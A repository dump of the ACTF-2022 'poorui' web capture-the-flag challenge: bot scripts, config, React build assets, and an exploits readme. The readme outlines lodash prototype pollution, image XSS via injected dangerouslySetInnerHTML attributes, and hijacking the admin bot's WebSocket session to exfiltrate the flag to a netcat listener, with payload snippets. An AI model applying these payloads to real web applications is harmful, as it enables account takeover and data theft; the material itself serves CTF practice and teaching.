libcups2 libdrm2 libxkbcommon0 libxcomposite1 libxdamage1 libxfixes3 libxrandr2 libgbm1 libasound2 8 | 9 | ENV FLAG="ACTF{**********}" LISTEN="0.0.0.0" 10 | 11 | CMD ["/bin/bash", "./start.sh"] -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/adminbot.js: -------------------------------------------------------------------------------- 1 | import puppeteer from "puppeteer"; 2 | 3 | const SERVER_URL = 'http://localhost:8081/chat'; 4 | const USERNAME = 'admin'; 5 | 6 | (async () => { 7 | const browser = await puppeteer.launch({ 8 | headless: process.env.DEBUG ?? true 9 | }); 10 | const page = await browser.newPage() 11 | await page.goto(SERVER_URL) 12 | await page.type('#username', USERNAME) 13 | await page.click('#btn-login') 14 | page.on('load', () => { 15 | console.log(page.url()) 16 | if(page.url() !== SERVER_URL){ 17 | setTimeout(async () => { 18 | await page.goto(SERVER_URL) 19 | await page.type('#username', USERNAME) 20 | await page.click('#btn-login') 21 | }, 3000); 22 | } 23 | }) 24 | })(); -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/config.js: -------------------------------------------------------------------------------- 1 | export const FLAG = process.env.FLAG ?? 'flag{this_is_a_flag}' 2 | export const WS_SERVER = 'ws://127.0.0.1:8081' 3 | export const PORT = 8081 4 | export const LISTEN = process.env.LISTEN ?? 'localhost' -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/flagbot.js: -------------------------------------------------------------------------------- 1 | import WebSocket from "ws"; 2 | import { FLAG, WS_SERVER } from "./config.js"; 3 | import { isJson } from "./util.js"; 4 | 5 | const conn = new WebSocket(WS_SERVER) 6 | const username = 'flagbot' 7 | 8 | const handleLogin = () => { 9 | conn.send(JSON.stringify({ 10 | api: "login", 11 | username: username 12 | })) 13 | } 14 | 15 | const handleGetFlag = (from) => { 16 | console.log('[getflag]', from) 17 | if(from === 'admin'){ 18 | conn.send(JSON.stringify({ 19 | api: 'sendflag', 20 | flag: FLAG, 21 | to: from 22 | })) 23 | } 24 | } 25 | 26 | const handleList = (list) => { 27 | console.log(list) 28 | } 29 | 30 | const handleMsg = (msg) => { 31 | switch(msg.api){ 32 | case "login": 33 | handleLogin() 34 | break 35 | case "list": 36 | handleList(msg.peers) 37 | break 38 | case "getflag": 39 | if(msg.from) handleGetFlag(msg.from) 40 | break 41 | default: 42 | console.log("unknown api", msg.api) 43 | } 44 | } 45 | 46 | conn.onopen = () => { 47 | const msg = { 48 | api: "ping", 49 | data: "hello world" 50 | } 51 | conn.send(JSON.stringify(msg)) 52 | conn.send(JSON.stringify({api: "list"})) 53 | } 54 | 55 | conn.on('message', msg => { 56 | console.log('[onmessage]', msg.toString()) 57 | if(isJson(msg)){ 58 | handleMsg(JSON.parse(msg)) 59 | } 60 | }) -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "type": "module", 3 | "dependencies": { 4 | "body-parser": "^1.20.0", 5 | "express": "^4.18.1", 6 | "puppeteer": "^14.4.1", 7 | "uuid": "^8.3.2", 8 | "ws": "^8.5.0" 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/asset-manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "files": { 3 | "main.css": "/static/css/main.c7f24255.css", 4 | "main.js": "/static/js/main.6e3bc586.js", 5 | "index.html": "/index.html", 6 | "main.c7f24255.css.map": "/static/css/main.c7f24255.css.map", 7 | "main.6e3bc586.js.map": "/static/js/main.6e3bc586.js.map" 8 | }, 9 | "entrypoints": [ 10 | "static/css/main.c7f24255.css", 11 | "static/js/main.6e3bc586.js" 12 | ] 13 | } -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/poorui/attachments/src/source/public/favicon.ico -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/index.html: -------------------------------------------------------------------------------- 1 | React App
-------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/poorui/attachments/src/source/public/logo192.png -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/poorui/attachments/src/source/public/logo512.png -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/css/main.66b2f292.css: -------------------------------------------------------------------------------- 1 | body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,sans-serif;margin:0}code{font-family:source-code-pro,Menlo,Monaco,Consolas,Courier New,monospace}.App{text-align:center}.App-logo{height:40vmin;pointer-events:none}@media (prefers-reduced-motion:no-preference){.App-logo{-webkit-animation:App-logo-spin 20s linear infinite;animation:App-logo-spin 20s linear infinite}}.App-header{align-items:center;background-color:#282c34;color:#fff;display:flex;flex-direction:column;font-size:calc(10px + 2vmin);justify-content:center;min-height:100vh}.App-link{color:#61dafb}@-webkit-keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.msg-list{background-color:silver;margin:10px auto;padding:10px;width:50%}.msg-item{margin:20px auto;width:60%}.msg-card{background-color:#faebd7;border:5px;border-radius:5px;padding:5px}.from{background-color:aqua;margin:0;text-align:left}.content,.from{padding:5px 10px}.content{background-color:#7fffd4}.text{padding:5px;text-align:left}.warning-text{background-color:#f44336;padding:10px} -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/css/main.c7f24255.css: -------------------------------------------------------------------------------- 1 | body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,sans-serif;margin:0}code{font-family:source-code-pro,Menlo,Monaco,Consolas,Courier New,monospace}.App{text-align:center}.App-logo{height:40vmin;pointer-events:none}@media (prefers-reduced-motion:no-preference){.App-logo{-webkit-animation:App-logo-spin 20s linear infinite;animation:App-logo-spin 20s linear infinite}}.App-header{align-items:center;background-color:#282c34;color:#fff;display:flex;flex-direction:column;font-size:calc(10px + 2vmin);justify-content:center;min-height:100vh}.App-link{color:#61dafb}@-webkit-keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.msg-list{background-color:silver;margin:10px auto;padding:10px;width:50%}.msg-item{margin:20px auto;width:60%}.msg-card{background-color:#faebd7;border:5px;border-radius:5px;padding:5px}.from{background-color:aqua;margin:0;text-align:left}.content,.from{padding:5px 10px}.content{background-color:#7fffd4}.text{padding:5px;text-align:left}.warning-text{background-color:#f44336;padding:10px} 2 | /*# sourceMappingURL=main.c7f24255.css.map*/ -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/js/main.001408dd.js.LICENSE.txt: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Lodash 4 | * Copyright JS Foundation and other contributors 5 | * Released under MIT license 6 | * Based on Underscore.js 1.8.3 7 | * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors 8 | */ 9 | 10 | /** 11 | * @license React 12 | * react-dom.production.min.js 13 | * 14 | * Copyright (c) Facebook, Inc. and its affiliates. 15 | * 16 | * This source code is licensed under the MIT license found in the 17 | * LICENSE file in the root directory of this source tree. 18 | */ 19 | 20 | /** 21 | * @license React 22 | * react-jsx-runtime.production.min.js 23 | * 24 | * Copyright (c) Facebook, Inc. and its affiliates. 25 | * 26 | * This source code is licensed under the MIT license found in the 27 | * LICENSE file in the root directory of this source tree. 28 | */ 29 | 30 | /** 31 | * @license React 32 | * react.production.min.js 33 | * 34 | * Copyright (c) Facebook, Inc. and its affiliates. 35 | * 36 | * This source code is licensed under the MIT license found in the 37 | * LICENSE file in the root directory of this source tree. 38 | */ 39 | 40 | /** 41 | * @license React 42 | * scheduler.production.min.js 43 | * 44 | * Copyright (c) Facebook, Inc. and its affiliates. 45 | * 46 | * This source code is licensed under the MIT license found in the 47 | * LICENSE file in the root directory of this source tree. 48 | */ 49 | 50 | /** 51 | * React Router v6.3.0 52 | * 53 | * Copyright (c) Remix Software Inc. 54 | * 55 | * This source code is licensed under the MIT license found in the 56 | * LICENSE.md file in the root directory of this source tree. 57 | * 58 | * @license MIT 59 | */ 60 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/js/main.11c0ee5f.js.LICENSE.txt: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Lodash 4 | * Copyright JS Foundation and other contributors 5 | * Released under MIT license 6 | * Based on Underscore.js 1.8.3 7 | * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors 8 | */ 9 | 10 | /** 11 | * @license React 12 | * react-dom.production.min.js 13 | * 14 | * Copyright (c) Facebook, Inc. and its affiliates. 15 | * 16 | * This source code is licensed under the MIT license found in the 17 | * LICENSE file in the root directory of this source tree. 18 | */ 19 | 20 | /** 21 | * @license React 22 | * react-jsx-runtime.production.min.js 23 | * 24 | * Copyright (c) Facebook, Inc. and its affiliates. 25 | * 26 | * This source code is licensed under the MIT license found in the 27 | * LICENSE file in the root directory of this source tree. 28 | */ 29 | 30 | /** 31 | * @license React 32 | * react.production.min.js 33 | * 34 | * Copyright (c) Facebook, Inc. and its affiliates. 35 | * 36 | * This source code is licensed under the MIT license found in the 37 | * LICENSE file in the root directory of this source tree. 38 | */ 39 | 40 | /** 41 | * @license React 42 | * scheduler.production.min.js 43 | * 44 | * Copyright (c) Facebook, Inc. and its affiliates. 45 | * 46 | * This source code is licensed under the MIT license found in the 47 | * LICENSE file in the root directory of this source tree. 48 | */ 49 | 50 | /** 51 | * React Router v6.3.0 52 | * 53 | * Copyright (c) Remix Software Inc. 54 | * 55 | * This source code is licensed under the MIT license found in the 56 | * LICENSE.md file in the root directory of this source tree. 57 | * 58 | * @license MIT 59 | */ 60 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
wow
4 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | pm2 start server.js 4 | pm2 start adminbot.js 5 | pm2 start flagbot.js 6 | tail -f /dev/null -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/tpls/test.tpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 |

hello, {{username}}

6 |
7 |

How to use this template?

8 |

Just type a json in the sendbox like following:

9 |
10 | 11 | { "username": "admin" } 12 | 13 |
14 | 15 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/util.js: -------------------------------------------------------------------------------- 1 | export const isJson = (s) => { 2 | try{ 3 | if(JSON.parse(s) instanceof Object){ 4 | return true 5 | } 6 | }catch(e){ 7 | // console.log(e) 8 | } 9 | return false 10 | } -------------------------------------------------------------------------------- /web/poorui/exploits/readme.md: -------------------------------------------------------------------------------- 1 | # Chatting 2 | 3 | ~~直接admin登陆getflag~~ 4 | 5 | (唉应该加个限制admin登陆ip的) 6 | 7 | expected exploit approach 8 | 1. lodash prototype pollution 9 | 2. image xss (many ways) 10 | 3. make the admin refresh the browser page and goto a third party site which would connect to the websocket server as a client 11 | 4. login as admin, getflag and send it to your favorite `nc -lvp 1337` 12 | 13 | ### Details 14 | 15 | prototype pollution payload: 16 | ```js 17 | content: { 18 | type: 'tpl', 19 | data: { 20 | tpl: '

{{b}}

', 21 | ctx: '{"a":123, "b":123, "__proto__":{"allowImage":true}}' 22 | } 23 | } 24 | ``` 25 | 26 | xss payload: 27 | ```js 28 | content: { 29 | type: 'image', 30 | data: { 31 | src: 'https://i.picsum.photos/id/220/200/200.jpg?hmac=1eed0JUIOlpc-iGslem_jB1FORVXUdRtOmgpHxDDKZQ', 32 | attrs: { 33 | wow: 1, 34 | dangerouslySetInnerHTML: { 35 | __html: "" 36 | } 37 | } 38 | } 39 | } 40 | ``` 41 | --------------------------------------------------------------------------------